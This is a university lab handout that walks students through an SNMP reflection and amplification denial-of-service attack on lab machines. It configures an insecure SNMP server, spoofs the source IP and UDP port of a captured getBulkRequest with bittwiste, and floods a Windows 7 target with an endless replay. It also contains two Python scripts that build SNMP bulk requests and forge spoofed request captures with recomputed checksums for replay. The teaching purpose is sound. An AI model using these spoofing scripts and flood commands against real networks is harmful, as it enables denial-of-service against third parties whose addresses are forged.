Proj 5x: Packet Amplification with SNMP (20 pts. extra credit)

What you need

Purpose

SNMP is a UDP-based protocol (port 161) that is frequently set up in an unsafe manner: SNMP v1 and v2c authenticate with nothing more than a plaintext community string, commonly "public", and a small request can draw a much larger response. Because UDP has no handshake, an attacker can forge the source address of the request, so any such SNMP server can be used to reflect and amplify a DoS attack against whatever address was forged. Restricting which hosts may query the server and what community string they must use, and filtering spoofed source addresses at the network edge, are what prevent this.

This project demonstrates the attack.

Disabling Routing and Remote Access

Routing and Remote Access interferes with the network traffic in this project if it is running, so we'll shut it off.

On your Windows 2008 Server, click Start and type in SERVICES

In the results, click Services.

Scroll down to find "Routing and Remote Access", as shown below. If it is there, click Stop to stop it. If it is not there, that's OK.

Enabling SNMP on the Windows 2008 Server

Follow these steps to enable SNMP:

http://blog.skufel.net/2012/09/how-to-adding-snmp-to-windows-server-2008-r2/

Configure your server with these outrageously insecure settings, as shown below (the rest of the project relies on a community name of "public" that any host on the network can read):

Open a Command Prompt and execute the IPCONFIG command to find your Windows Server 2008 machine's IP address. Record it for future use.

Testing SNMP from Kali Linux

On your Kali Linux machine, in a Terminal window, execute this command, replacing the IP address with the IP address of your Windows server.
snmpbulkwalk -v 2c -c public 192.168.119.191
You should see many pages of output, as shown below.

If you don't see a response, check your networking to make sure the packets are reaching the target, that the SNMP service is running on the Windows server, and that the Windows Firewall is not blocking UDP port 161.

Viewing the SNMP Request in Wireshark

On your Kali Linux machine, open another Terminal window and execute this command:
wireshark
Start Wireshark sniffing on your network adapter.

On your Kali Linux machine, in the other Terminal window, execute this command again, replacing the IP address with the IP address of your Windows server.

snmpbulkwalk -v 2c -c public 192.168.119.191
In Wireshark, at the upper left, in the Filter box, type this text and then press the Enter key:
udp.port==161
You see a long series of "SNMP getBulkRequest" packets, each followed by an "SNMP get-response", as shown below.
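What snmpbulkwalk is actually sending, as an added example that is not part of the original lab and not net-snmp's code: a short Python encoder and decoder for the SNMPv2c getBulkRequest message seen in Wireshark above. The defaults follow net-snmp (version field 1 for v2c, non-repeaters 0, max-repetitions 10, starting OID 1.3.6.1.2.1); the request-id 0x1234 is made up. The lab's 87-byte request has the same structure with a longer OID, because each later request in a walk starts from the last OID the server returned.

```python
"""Hand-built SNMPv2c GetBulkRequest, the PDU snmpbulkwalk sends (BER encoding)."""


def ber_len(n):
    """BER length octets: short form below 128, long form above."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def tlv(tag, body):
    return bytes([tag]) + ber_len(len(body)) + body


def ber_int(v):
    """INTEGER (tag 0x02), minimal two's-complement length; non-negative values only."""
    return tlv(0x02, v.to_bytes(v.bit_length() // 8 + 1, "big", signed=True))


def ber_oid(dotted):
    """OBJECT IDENTIFIER (tag 0x06): first two arcs packed as 40*a+b, the rest base-128."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = [40 * arcs[0] + arcs[1]]
    for a in arcs[2:]:
        chunk = [a & 0x7F]
        a >>= 7
        while a:
            chunk.insert(0, 0x80 | (a & 0x7F))
            a >>= 7
        out += chunk
    return tlv(0x06, bytes(out))


def get_bulk_request(community, oid, request_id, non_repeaters=0, max_repetitions=10):
    """SNMPv2c message: SEQUENCE { version=1, community, GetBulkRequest-PDU [5] }.
    Defaults match snmpbulkwalk: non-repeaters 0, max-repetitions 10."""
    varbind = tlv(0x30, ber_oid(oid) + b"\x05\x00")  # OID with a NULL value
    pdu = tlv(0xA5, ber_int(request_id) + ber_int(non_repeaters)
              + ber_int(max_repetitions) + tlv(0x30, varbind))
    return tlv(0x30, ber_int(1) + tlv(0x04, community.encode()) + pdu)


def read_tlv(buf, pos=0):
    """Return (tag, body, next_pos) for the TLV starting at pos."""
    tag, ln, pos = buf[pos], buf[pos + 1], pos + 2
    if ln & 0x80:
        n = ln & 0x7F
        ln, pos = int.from_bytes(buf[pos:pos + n], "big"), pos + n
    return tag, buf[pos:pos + ln], pos + ln


def as_int(b):
    return int.from_bytes(b, "big", signed=True)


def parse_bulk_request(msg):
    """Decode the fields Wireshark shows for an 'SNMP getBulkRequest'."""
    _, body, _ = read_tlv(msg)
    _, version, p = read_tlv(body)
    _, community, p = read_tlv(body, p)
    ptag, pdu, _ = read_tlv(body, p)
    if ptag != 0xA5:
        raise ValueError("not a GetBulkRequest PDU (tag 0x%02x)" % ptag)
    _, rid, q = read_tlv(pdu)
    _, nonrep, q = read_tlv(pdu, q)
    _, maxrep, q = read_tlv(pdu, q)
    _, vbl, _ = read_tlv(pdu, q)
    count, r = 0, 0
    while r < len(vbl):
        _, _, r = read_tlv(vbl, r)
        count += 1
    return {"version": as_int(version), "community": community.decode(),
            "request_id": as_int(rid), "non_repeaters": as_int(nonrep),
            "max_repetitions": as_int(maxrep), "varbinds": count}


def frame_size(msg):
    """Bytes on the wire: Ethernet (14) + IPv4 (20) + UDP (8) + SNMP message."""
    return 14 + 20 + 8 + len(msg)


if __name__ == "__main__":
    req = get_bulk_request("public", "1.3.6.1.2.1", 0x1234)
    print(req.hex(), frame_size(req), parse_bulk_request(req))
    # asking for a thousand times more rows makes the request exactly one byte longer
    big = get_bulk_request("public", "1.3.6.1.2.1", 0x1234, max_repetitions=10000)
    print(frame_size(big) - frame_size(req))
```

The point to take from it: max-repetitions, the field that tells the agent how many rows to return, costs one or two bytes, so the request stays at about 80 bytes on the wire however much it asks for. A fixed request size against a response that grows with the data returned is the whole amplification game.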

Measuring Packet Amplification

In Wireshark, in the top pane, select one of the SNMP packets.

In the middle frame, expand the "Frame" section.

Right-click "Frame Length" and click "Apply as Column", as shown below.

Now the upper pane of Wireshark shows a column named "Frame length on the wire".

Click the "Frame length on the wire" column header to sort by it.

Scroll to the bottom to find the largest value. Note its packet number (the "No." column on the left). In the figure below, the largest value was 793 bytes for packet No. 15.

In Wireshark, click the No. column header to sort the packets in time order again.

Scroll as needed to see the largest packet and the request packet preceding it.

In the image below, the request packet was No. 14 (87 bytes) and the response was No. 15 (793 bytes), so the amplification factor is 793/87 = 9.1.

Saving the SNMP Request Packet

Click the "SNMP getBulkRequest" packet that gave the largest response, so it is highlighted in the top pane of Wireshark, as shown below.

From the Wireshark menu bar, click File, "Export Specified Packets...".

In the "Wireshark: Export Specified Packets" box, at the top, enter a name of "SNMP-Req-YOURNAME.pcap".

On the "Save in folder:" line, click Desktop.

In the lower left, click the "Selected packet only" button.

Select a "File type" of "Wireshark/tcpdump/... - libpcap", as shown below.

Click Save.

On your Kali Linux machine, close Wireshark.

Getting Bit-twist

Open a Web browser and go to

http://bittwist.sourceforge.net/

Download the Linux version and save it on your Kali desktop.

On your Kali Linux machine, in a Terminal window, execute these commands:

Note: when I installed libpcap-dev, I got an error processing "xplico" but it seems to be OK to just ignore that.

apt-get install libpcap-dev -y
cd 
cd Desktop
tar xzf bittwist-linux-2.0.tar.gz
cd bittwist-linux-2.0
make
make install

Find the Target IP Address

On your Windows 7 target machine, open a Command prompt and execute the IPCONFIG command to find its IP address.

Editing the SNMP Request Packet

Using bittwiste, we will change the source IP address of the SNMP request packet to the target's IP address, so that the server sends its response to the target instead of to Kali.

Bittwiste recalculates the IP and UDP checksums automatically; a packet with a stale checksum would be discarded instead of reflected.

On your Kali Linux machine, in a Terminal window, execute this command, replacing the IP address with your Windows 7 target machine's IP address:

cd
cd Desktop
bittwiste -I SNMP-Req-YOURNAME.pcap -O Attack-YOURNAME.pcap -T ip -s 192.168.119.229
When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.

Testing the Attack

On your Windows 2008 Server, start Wireshark sniffing.

In the Filter box, enter

snmp

and press Enter.

On your Kali Linux machine, in a Terminal window, execute this command:

bittwist -i eth0 Attack-YOURNAME.pcap -l 3
You should see three SNMP requests coming in, and three SNMP responses going out to the Windows 7 target, as shown below.

If you have displayed the packet length, you'll see that the responses are much larger than the requests.

On your Windows Server 2008 machine, close Wireshark.

Saving a Screen Image

Make sure your screen shows these two items:

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 5xa". Use your real name, not the literal text "Your Name".

Configuring IKE on the Target Windows 7 Machine

This attack has no visible effect on the target, because the SNMP responses are hitting a closed port and the target needs very few resources to discard them.

This attack is just a UDP flood at present, and if attackers use thousands of SNMP reflectors, that can overwhelm a network. But it makes a dull lab project.

To see the effect, we'll configure the Windows 7 machine to listen on UDP port 500, the IKE port used by L2TP/IPsec VPNs.

On your Windows 7 target machine, click Start, then "Control Panel", then "Network and Internet", then "Network and Sharing Center".

Click "Set up a new connection or network".

Select "Connect to a workplace" and click "Next".

Click "Use my Internet connection (VPN)".

For "Internet address:" enter 10.10.10.10

For "Destination name:" accept the default of "VPN Connection".

Check "Don't connect now; just set it up so I can connect later". Leave the other boxes unchecked, as shown below:

Click Next.

For "User name:" enter Student (any name will do; this connection is never actually made).

Leave "Password:", "Show characters", "Remember this password" and "Domain optional:" blank.

Click Create.

Now click Close. Do NOT click "Connect now".

Checking the Listening Port on the Windows 7 Target Machine

On your Windows 7 target machine, in a Command Prompt, execute this command:
netstat -an 
You should see an entry showing an open port of

UDP      0.0.0.0:500

as shown below:

Monitoring the CPU on the Target

On your Windows 7 target machine, right-click the Taskbar (at the bottom of the desktop) and click "Start Task Manager".

Click the Performance tab. You should see 0% CPU usage, or close to it, as shown below:

Leave Task Manager running.

Editing the Attack to Target a Listening Port

Using bittwiste, we will change the source UDP port of the SNMP request packet to 500. The SNMP server sends its response back to whatever source port the request came from, so the reflected responses will now arrive at UDP port 500 on the target, where the IKE service has to receive and parse each one instead of discarding it at a closed port. That burdens the target far more.

On your Kali Linux machine, in a Terminal window, execute this command:

bittwiste -I Attack-YOURNAME.pcap -O Attack2-YOURNAME.pcap -T udp -s 500
When the command succeeds, you should see the message "1 packets (87 bytes) written", as shown below.
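The Wireshark measurement above and the two bittwiste edits (source IP, then source port) in one place, as an added example that is not part of the original lab and not bittwist's code. It runs on a constructed two-frame capture with the lab's sizes (an 87-byte request and a 793-byte response; the Kali address 192.168.119.130 and the payload bytes are made up), pairs each SNMP response with the request it answers to find the largest amplification factor, then rewrites that request's source IP and source port and recomputes the IPv4 and UDP checksums, which is the part of the forgery that has to be right for the reflector to answer at all.

```python
"""Measure SNMP reflection amplification in a pcap and forge the spoofed request (checksums included)."""
import socket
import struct

PCAP_MAGIC, SNMP_PORT = 0xA1B2C3D4, 161

def checksum(data):
    """RFC 1071 one's-complement sum; 0 when the data already carries a correct checksum."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF

def parse_pcap(blob):
    """[(timestamp, frame)] from a classic libpcap file, either byte order."""
    endian = {PCAP_MAGIC: "<", 0xD4C3B2A1: ">"}[struct.unpack("<I", blob[:4])[0]]
    frames, pos = [], 24
    while pos + 16 <= len(blob):
        sec, usec, caplen, _ = struct.unpack(endian + "IIII", blob[pos:pos + 16])
        frames.append((sec + usec / 1e6, blob[pos + 16:pos + 16 + caplen]))
        pos += 16 + caplen
    return frames

def write_pcap(frames):
    """Little-endian pcap, link type 1 (Ethernet): the format bittwist replays."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, 1)
    for ts, frame in frames:
        out += struct.pack("<IIII", int(ts), round(ts % 1 * 1e6), len(frame), len(frame)) + frame
    return out

def udp_fields(frame):
    """Addresses and ports of an Ethernet/IPv4/UDP frame, else None."""
    if len(frame) < 42 or frame[12:14] != b"\x08\x00" or frame[23] != 17:
        return None
    udp = 14 + (frame[14] & 0x0F) * 4
    sport, dport = struct.unpack("!HH", frame[udp:udp + 4])
    return {"src": socket.inet_ntoa(frame[26:30]), "dst": socket.inet_ntoa(frame[30:34]),
            "sport": sport, "dport": dport}

def amplification(frames):
    """Pair each SNMP response with its request (same hosts, ports swapped); largest byte ratio wins."""
    best, pending = None, {}
    for no, (_, frame) in enumerate(frames, 1):
        f = udp_fields(frame)
        if f and f["dport"] == SNMP_PORT:
            pending[(f["src"], f["sport"], f["dst"])] = (no, len(frame))
        elif f and f["sport"] == SNMP_PORT:
            req = pending.get((f["dst"], f["dport"], f["src"]))
            if req and (best is None or len(frame) / req[1] > best[0]):
                best = (len(frame) / req[1], req[0], no)   # (ratio, request No., response No.)
    return best

def fix_checksums(frame):
    """Recompute the IPv4 header checksum and the UDP checksum over the IPv4 pseudo-header."""
    buf, udp = bytearray(frame), 14 + (frame[14] & 0x0F) * 4
    buf[24:26] = b"\x00\x00"
    buf[24:26] = struct.pack("!H", checksum(bytes(buf[14:udp])))
    udp_len = struct.unpack("!H", buf[udp + 4:udp + 6])[0]
    buf[udp + 6:udp + 8] = b"\x00\x00"
    pseudo = bytes(buf[26:34]) + struct.pack("!BBH", 0, 17, udp_len)
    buf[udp + 6:udp + 8] = struct.pack("!H", checksum(pseudo + bytes(buf[udp:udp + udp_len])) or 0xFFFF)
    return bytes(buf)

def checksums_ok(frame):
    return fix_checksums(frame) == bytes(frame)

def spoof(frame, new_src, new_sport=None):
    """What bittwiste -T ip -s / -T udp -s do: new source IP and source port, checksums redone."""
    buf, udp = bytearray(frame), 14 + (frame[14] & 0x0F) * 4
    buf[26:30] = socket.inet_aton(new_src)
    if new_sport is not None:
        buf[udp:udp + 2] = struct.pack("!H", new_sport)
    return fix_checksums(buf)

def make_frame(src, dst, sport, dport, payload):
    """Constructed sample frame: real headers, dummy payload (only the sizes matter)."""
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 28 + len(payload), 0x1234, 0, 64, 17, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    udp = struct.pack("!HHHH", sport, dport, 8 + len(payload), 0) + payload
    return fix_checksums(bytes.fromhex("000c29000001000c290000020800") + ip + udp)

# Constructed two-frame capture with the lab's sizes (87-byte request, 793-byte
# response); the Kali address 192.168.119.130 is an assumption.
KALI, SERVER, TARGET = "192.168.119.130", "192.168.119.191", "192.168.119.229"
SAMPLE = [(1.000, make_frame(KALI, SERVER, 40000, SNMP_PORT, b"\x30" * 45)),
          (1.002, make_frame(SERVER, KALI, SNMP_PORT, 40000, b"\x30" * 751))]

def build_attack(frames, target_ip, target_port=None):
    """Take the request that drew the largest reply and aim that reply at the target."""
    ratio, req_no, _ = amplification(frames)
    return ratio, spoof(frames[req_no - 1][1], target_ip, target_port)

if __name__ == "__main__":
    ratio, attack = build_attack(SAMPLE, TARGET, 500)
    print("amplification %.1fx" % ratio, udp_fields(attack), checksums_ok(attack))
    open("Attack2-example.pcap", "wb").write(write_pcap([(0.0, attack)]))  # replay with bittwist
```

Run as a script it reports 9.1x for the sample pair and writes Attack2-example.pcap, which bittwist -i eth0 Attack2-example.pcap -l 3 replays exactly like the lab's file. To reproduce only the first edit (new source IP, port unchanged), call spoof() without a port. To measure a real capture, feed parse_pcap() the pcap you exported from Wireshark instead of SAMPLE.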

Attacking Port 500

On your Kali Linux machine, in a Terminal window, execute this command:
bittwist -i eth0 Attack2-YOURNAME.pcap -l 0
This sends an endless flood of SNMP requests to the Windows 2008 Server, which reflect and amplify, attacking the Windows 7 target.

You should see the CPU increase, as shown below. On one of my test machines, it rose to 50%, but on the one shown below, it only rose to 18%.

On your Kali Linux machine, press Ctrl+C to stop the attack.

Saving a Screen Image

Make sure your screen shows the CPU graph rising from near-zero to some larger sustained value.

Click the taskbar at the bottom of your host Windows 7 desktop, to make the host machine listen to the keyboard, instead of the virtual machine.

Press the PrintScrn key in the upper-right portion of the keyboard. That will copy the whole desktop to the clipboard.

YOU MUST SUBMIT A FULL-SCREEN IMAGE TO GET FULL CREDIT!

On the host machine, not the virtual machine, open Paint and paste in the image.

Save the image with the filename "Your Name Proj 5xb". Use your real name, not the literal text "Your Name".

Turning in your Project

Email the images as attachments to an e-mail message.

Send it to: cnit.124@gmail.com with a subject line of "Proj 5x From Your Name", replacing "Your Name" with your own first and last name.

Send a Cc to yourself.

Sources

Analysis of SNMP/NTP/CHARGEN DrDOS Attacks, Prolexic, 2013

SNMP Reflected Denial of Service

NTP BASED DDOS ATTACK – UNDERSTANDING NTP REFLECTION (2014)

How-to : Adding SNMP to Windows Server 2008 R2

Duplicate network traffic from guest

Duplicate ping response when running Ubuntu as virtual machine (VMWare)

Windows 7 manual configuration for L2TP/IPSec VPN clients


Last Modified: 5-7-14 8:49 pm